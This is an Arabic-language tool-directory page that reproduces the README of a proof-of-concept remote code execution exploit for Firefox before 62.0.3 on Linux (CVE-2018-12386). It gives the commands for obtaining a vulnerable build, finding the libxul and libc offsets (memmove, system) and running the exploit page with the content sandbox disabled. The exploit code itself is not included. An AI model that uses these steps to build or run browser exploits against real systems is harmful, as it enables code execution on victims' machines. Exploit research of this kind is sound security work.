Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2018-12386 — CVE-2018-12386 - استغلال RCE في بيئة Firefox المعزولة لنظام Linux (Firefox <v62.0.3) | Kitploit
أدوات/GitHubGitHub/hydra3evil/cve-2018-12386
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubhydra3evil/cve-2018-12386

cve-2018-12386

CVE-2018-12386 - استغلال RCE في بيئة Firefox المعزولة لنظام Linux (Firefox <v62.0.3)

عرض المستودع
212منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال RCE في صندوق حماية Firefox (CVE-2918-12386)

هذا استغلال بسيط للثغرة CVE-2018-12386 التي اكتشفها Niklas Baumstark وSamuel Groß وBruno Keith.

هذا في الغالب إثبات مفهوم (PoC) قمت به للمتعة، ولا يوجد فيه تجاوز لصندوق الحماية، ولن يعمل إلا على إعداد Linux معيّن تكون فيه الإزاحات المستخدمة في الاستغلال معروفة مسبقاً (يمكن تغييرها في exploit/offsets.js).

يعمل هذا الاستغلال مع الإصدارات السابقة لـ Firefox 62.0.3 وFirefox ESR 60.2.2.

تنزيل Firefox لاختبار الاستغلال

يمكنك تنزيل إصدارات Firefox السابقة مباشرةً من خادم FTP الخاص بـ Mozilla: https://ftp.mozilla.org/pub/firefox/releases/

يمكنك استخدام، على سبيل المثال، الإصدار 62.0.2 لنظام Linux 64-bit: https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2.

root@kitploit:~
wget https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2
bzip2 -d firefox-62.0.2.tar.bz2
tar xvf firefox-62.0.2.tar

العثور على الإزاحات

إزاحات libxul.so

libxul_math_max

إذا كنت تستخدم Firefox 62.0.2، فينبغي أن تكون الإزاحة المقدمة في exploit/offsets.js هي الصحيحة.

أما بالنسبة للإصدارات الأخرى، فيمكنك بسهولة استخدام بدائية addrof لتسريب عنوان دالة JavaScript Math.max، ثم العثور على العنوان الأساسي لـ libxul.so لمثيل Firefox الذي تستغله حالياً (على سبيل المثال باستخدام cat /proc/$(pidof firefox)/maps)، وطرح الاثنين للحصول على إزاحة libxul_math_max.

libxul_got_memmove

إذا كنت تستخدم Firefox 62.0.2، فينبغي أن تكون الإزاحة المقدمة في exploit/offsets.js هي الصحيحة.

أما بالنسبة للإصدارات الأخرى، فيمكنك بسهولة استخدام objdump.

root@kitploit:~
[asriel@core firefox-62.0.2]$ objdump -d libxul.so | grep -i memmove@GLIBC
  8006f0:   ff 25 7a ac 40 05       jmpq   *0x540ac7a(%rip)        # 5c0b370 <memmove@GLIBC_2.2.5>

5c0b370 هي القيمة التي تحتاجها، أي إزاحة memmove في libxul.so.

إزاحات libc.so.6

تعتمد هذه الإزاحات كلياً على إصدار libc الذي تستخدمه.

root@kitploit:~
# libc.so.6 location

[asriel@core firefox-62.0.2]$ ldd /bin/ls | grep libc.so.6 | cut -d' ' -f3
/usr/lib/libc.so.6

libc_memmove

root@kitploit:~
[asriel@core firefox-62.0.2]$ nm /usr/lib/libc.so.6 | grep __memmove_avx_unaligned_erms
0000000000160c90 t __memmove_avx_unaligned_erms

libc_system

root@kitploit:~
[asriel@core firefox-62.0.2]$ nm /usr/lib/libc.so.6 | grep " system"
0000000000044dd0 W system

اختبار الاستغلال

بمجرد حصولك على Firefox والإزاحات الصحيحة، يمكنك اختبار الاستغلال عن طريق تشغيل الأمر التالي:

root@kitploit:~
MOZ_DISABLE_CONTENT_SANDBOX=1 /path/to/vulnerable/firefox /path/to/cve-2018-12386/exploit/pwn.html

تجريبي

تواصل

إذا أردت إلقاء التحية: @Asri3l

تنزيل الأداة